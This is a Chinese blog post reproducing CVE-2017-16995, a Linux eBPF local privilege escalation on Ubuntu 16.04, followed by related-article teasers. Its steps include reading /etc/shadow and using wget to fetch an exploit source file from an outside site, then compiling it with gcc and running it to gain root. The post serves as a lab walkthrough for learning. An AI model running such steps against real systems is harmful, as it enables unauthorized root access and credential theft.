对CVE-2017-16995的复现

最新推荐文章于 2022-04-23 14:05:52 发布
最新推荐文章于 2022-04-23 14:05:52 发布
阅读量596 收藏 1
点赞数
分类专栏: cve复现 文章标签: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ws13129/article/details/89391046
版权

CVE-2017-16995
0x01 概述:
该漏洞存在于Linux内核带有的eBPF bpf(2)系统调用中,当用户提供恶意BPF程序使eBPF验证器模块产生计算错误,导致任意内存读写问题。
0x02 影响版本:
Linux内核:Linux Kernel Version 4.14 ~ 4.4
Ubuntu版本:16.04.01~ 16.04.04
0x03 复现:
1)复现版本:ubuntu-16.04.3-server-amd64.iso
2)使用普通账号密码secquan/secquan登录
在这里插入图片描述
3)查看用户ID(id)与版本(cat/proc/version )
在这里插入图片描述
4)查看密码,提示无权限(cat/etc/shadow)
在这里插入图片描述
5)下载poc代码(wget http://cyseclabs.com/pub/upstream44.c)
在这里插入图片描述
6)下载并编译gcc(sudo apt install gcc)【ps:此处需要输入secquan密码】
在这里插入图片描述

7)使用gcc编译poc(gcc -o secquan upstream44.c)
在这里插入图片描述
8)运行secquan文件(./secquan)
在这里插入图片描述

cxk331
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Ubuntu本地提权漏洞(CVE-2017-16995)
锋刃科技的博客
11-27 1739
简介 Linux kernel是美国Linux基金会发布的开源操作系统Linux所使用的内核。 漏洞概述 该漏洞存在于带有 eBPF bpf(2)系统(CONFIG_BPF_SYSCALL)编译支持的Linux内核中,是一个内存任意读写漏洞。该漏洞是由于eBPF验证模块的计算错误产生的。普通用户可以构造特殊的BPF来触发该漏洞,此外恶意攻击者也可以使用该漏洞来进行本地提权操作。 影响版本 Linux Kernel Version 4.14-4.4 (主要影响Debian和Ubuntu发行版
Ubuntu 16.04提权漏洞(CVE-2017-16995)
小千安全
05-06 442
CVE-2017-16995是一个非常严重的漏洞,攻击者可以利用该漏洞来root提权,尽量不要使用低版本的Ubuntu的系统。
CVE-2017-16995脚本
03-20
Ubuntu本地内核提权,用于大家一起学习,更好的维护好系统
CVE-2017-12615-master.zip
09-04
CVE-2017-12615漏洞利用工具;CVE-2017-12615漏洞利用工具;
重大安全事件 | Ubuntu 16.04.4 暴本地提权漏洞
运维派
03-17 2540
漏洞简介Twitter 上 Nikolenko 发推表示 Ubuntu 最新版本存在一个本地提权漏洞,攻击者通过该漏洞可以直接获取 root 权限。该漏洞(CVE-2017-16995)早在老版本中已经完成修,但是在 Ubuntu 16.04   版本中依旧可以被利用。影响范围目前已知范围:Ubuntu 16.04  Linux Kernel Version 4.14-4.4 (主要影响 Deb
Ubuntu内核提权(CVE-2017-16995)漏洞的&脏牛漏洞
weixin_43815032的博客
09-06 1407
Ubuntu内核提权漏洞的 这里先介绍一下漏洞,Ubuntu是一个以桌面应用为主的开源GNU/Linux操作系统,基于Debian GNU/Linux 。近期有白帽子爆出 ubuntu 的最新版本(Ubuntu 16.04)存在本地提权漏洞,漏洞编号为CVE-2017-16995。 漏洞分享:Ubuntu本地提权(CVE-2017-169...
Ubuntu 16.04漏洞(CVE-2017-16995)
weixin_44522540的博客
04-23 2079
简介 Linux kernel是美国Linux基金会发布的开源操作系统Linux所使用的内核。 漏洞概述 该漏洞存在于带有 eBPF bpf(2)系统(CONFIG_BPF_SYSCALL)编译支持的Linux内核中,是一个内存任意读写漏洞。该漏洞是由于eBPF验证模块的计算错误产生的。普通用户可以构造特殊的BPF来触发该漏洞,此外恶意攻击者也可以使用该漏洞来进行本地提权操作。 过程 查看当前用户id (1)来到“tmp”目录下,执行文件perl linux-exploit-suggester-2.p
CVE-2017-16995漏洞分析
weixin_42177005的博客
12-01 1951
CVE-2017-16995特定内核提权漏洞分析 前言 这个漏洞于2017年12月21号Google Project Zero团队的Jann Horn发并报告的,编号为CVE-2017-16995,然而在2018年4月再次被国外安全研究者Vitaly Nikolenko发,并可以对特定内核版本的Ubuntu 16.04进行提权。 这个漏洞没有使用传统的漏洞利用方式,没有使用堆栈。看了P4nda...
CVE-2017-16995————Ubuntu本地提权漏洞
Fly_鹏程万里
05-15 4667
前言近期看到了Ubuntu本地提权漏洞所以顺手演示一份,实践一波!漏洞描述Ubuntu是一个以桌面应用为主的开源GNU/Linux操作系统,基于Debian GNU/Linux 。近期有白帽子爆出 ubuntu 的最新版本(Ubuntu 16.04)存在本地提权漏洞,漏洞编号为CVE-2017-16995。该漏洞存在于调用eBPF bpf(2)的Linux内核系统中,当用户提供恶意BPF程序使eB...
Ubuntu内核提权(CVE-2017-16995)
weixin_68652890的博客
04-15 742
内核提权 环境: 墨者靶场 工具 msf linux-exploit-suggester-master xshell 利用 xshell连接发是hack权限 上传linux-exploit-suggester.sh到服务器 Possible Exploits:   CVE-2017-16995   CVE-2016-5195 CVE-2016-5195也可以利用 我们这里利用CVE-2017-16995进行提权 影响 CVE-2017-16995 Linux
CVE-2017-12149的
看不尽的尘埃——博客
11-19 870
漏洞名称:JBOOS AS 6.X 反序列化漏洞 CVE编号:CVE-2017-12149 漏洞等级:高危 影响版本:5.x和6.x版本 漏洞描述及原理:2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没...
CVE-2017-11882
yiyiiyiy的博客
11-24 3201
CVE-2017-11882 前言漏洞基本信息 漏洞ID CVE-2017-11882 漏洞名称 Microsoft Office数学公式编辑器内存损坏漏洞 威胁类型 远程代码执行 漏洞类型 栈溢出,位于EQNEDT32.EXE组件中 漏洞影响版本Microsoft Office 2000 Microsoft Office 2003Microsoft Office 2007 Service
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,在修改成可以响应请求,命令格式为: CVE-2017-7269_remote_echo.py ip_address...
Nginx越界读取缓存漏洞 CVE-2017-7529
03-13
Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。... 如果我的请求中包含Range头,Nginx将会根据我指定的start和end位置,返回指定长度的内容。而如果我构造了两个负的位置,如(-600, -...
CVE-2017-16995-Ubuntu本地提权漏洞
墙角睡大觉的专栏
07-21 534
环境搭建 系统选择的是Ubuntu16.04-desktop-amd64.iso安装的环境,安装过程不用安装更新软件包。 漏洞分析&利用 在该环境下直接利用编译好之后的程序并不成功(4.4.0-21-generic),如下: 然后在Ubuntu14.04、16.04.4都试着还是不成功!都是报错,如下是14环境报错信息: 缺失头文件,然后在16.04.4下尝试: 很显然该版本4.13...
一、漏洞编号为CVE-2017-16995的本地提权(略微详细)(Ubuntu16.04.1-4)
qwsn
10-13 3091
漏洞编号为CVE-2017-16995的本地提权(略微详细)(Ubuntu16.04.1-4) CVE-2017-16995漏洞的本地提权 一、漏洞分析: 1.漏洞编号:CVE-2017-16995 2.漏洞运行的环境: ①Linux Kernel Version 4.14-4.4 //内核版本为4.14到4.4之间的都可以 ②仅影响Ubuntu/Debian发行版本 //因为ubu...
CVE-2017-16995 Ubuntu本地提权漏洞初探
weixin_33756418的博客
03-21 191
CVE-2017-16995 Ubuntu本地提权漏洞 漏洞描述 该漏洞存在于带有 eBPF bpf(2)系统(CONFIG_BPF_SYSCALL)编译支持的Linux内核中,是一个内存任意读写漏洞。该漏洞是由于eBPF验证模块的计算错误产生的。普通用户可以构造特殊的BPF来触发该漏洞,此外恶意攻击者也可以使用该漏洞来进行本地提权操作。 POC 原作者exp此处可下载(可能需要梯子,这里copy...
cve-2017-9841
最新发布
07-27
如果您想CVE-2017-9841漏洞,您需要使用受影响版本的PHPUnit,并将编写器模块放置在Web可访问目录中。然后,您可以通过向php://input发送恶意代码来利用该漏洞。请注意,漏洞是违法行为,且可能会对系统造成...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值